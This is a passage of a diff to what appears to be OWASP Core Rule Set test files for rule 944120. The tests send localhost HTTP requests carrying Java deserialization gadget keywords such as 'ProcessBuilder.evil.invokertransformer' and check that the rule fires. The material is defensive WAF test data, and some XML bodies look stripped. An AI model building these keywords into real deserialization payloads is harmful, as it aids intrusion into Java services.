"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-68 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-69 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 80 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-83 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 83 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-84 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-85 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-86 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 